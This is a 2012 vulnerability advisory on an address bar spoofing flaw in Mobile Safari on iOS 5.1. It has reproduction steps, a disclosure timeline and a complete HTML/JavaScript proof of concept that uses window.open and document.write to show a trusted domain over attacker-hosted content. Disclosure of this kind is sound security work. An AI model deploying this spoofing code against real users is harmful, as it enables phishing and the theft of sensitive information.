Apple Safari On iOS 5.1 Address Bar Spoofing

[MajorSecurity-SA-2012-014]Apple Safari on iOS 5.1 - Adressbar spoofing
vulnerability

Details
=============
Product: Apple Mobile Safari on iOS 5.1
Security-Risk: moderated
Remote-Exploit: yes
Vendor-URL: http://www.apple.com/
Advisory-Status: published

Credits
=============
Discovered by: David Vieira-Kurz of MajorSecurity

Affected Products
=============
Apple Mobile Safari on iOS 5.1
Prior versions may also be affected

The affected version produced following user-agent header
==========================
Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46
(KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3

Testing environment
==========================
The proof of concept has been tested on an iPhone4, iPhone4S, iPad2 and
iPad3 running iOS 5.1

Description
=============
"Mobile Safari is web browser for Apple's iOS."

More Details
=============
David Vieira-Kurz has discovered some vulnerabilities in Apple Mobile
Safari based on AppleWebkit/534.46 running on iOS 5.1.

The weakness is caused due to an error within the handling of URLs when
using javascript's window.open() method.
This can be exploited to potentially trick users into supplying
sensitive information to a malicious web site,
because information displayed in the address bar can be constructed in a
certain way,
which may lead users to believe that they're visiting another web site
than the displayed web site.

Steps to reproduce
=============
1) Visit http://majorsecurity.net/html5/ios51-demo.html with Safari on
iOS 5.1
2) click the "demo" button
3) Safari will open a new window with "http://www.apple.com" in the
adress bar,
but in fact "http://www.apple.com" is being displayed inside an iframe
within
the host http://www.majorsecurity.net
4) Safari's adress bar is showing "http://www.apple.com" which makes the
user believe he/she is currently
visiting Apple.com while he's still on the attacker's website .

Proof of Concept
=============
A proof-of-concept code is available here:
http://majorsecurity.net/html5/ios51-demo.html

Solution
=============
Users should upgrade to a newer version as far as the vendor has
supplied a patch.

Timeline
================
2012-03-01, vulnerability identified in iOS 5.0
2012-03-01, vulnerability reproduced with iOS 5.1
2012-03-02, vendor has been informed
2012-03-03, vendor response
2012-03-20, advisory published

Use of terms
================
Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise,
contact us for permission. Use of the advisory constitutes acceptance
for use in an "as is" condition. All warranties are excluded.
In no event shall MajorSecurity be liable for any damages whatsoever
including direct, indirect, incidental, consequential,
loss of business profits or special damages, even if MajorSecurity has
been advised of the possibility of such damages.

poc:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
 <head><title>MobileSafari iOS 5.1 - Adress bar spoofing poc</title>
  <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
 </head>
 <body>
  <fieldset>
   <legend>Some payment/bank website included here.</legend>
   <ol>
      <li>start poc<xmp>click the button to run the poc.</xmp><button id="one">Demo</button></li>
   </ol>
  </fieldset>
  <script type="text/javascript">
   document.getElementById('one').onclick = function() {
    myWindow=window.open('http://www.apple.com','eintitel','width=200,height=100,location=yes');
    myWindow.document.write("<html><head></head><body><strong>This is still hosted on MajorSecurity.net, but the the adressbar is being spoofed and is pointing to another FQDN. scary.</strong><br><br><iframe src=\"http://www.apple.com\");></iframe></scri+pt></body></html>");
    myWindow.focus();
     return false;
   }
  </script>
  <br><br><br><iframe id="ifR1" name="ifR1" width="100px" height="50px" src="http://www.apple.com"></iframe>
 </body>
</html>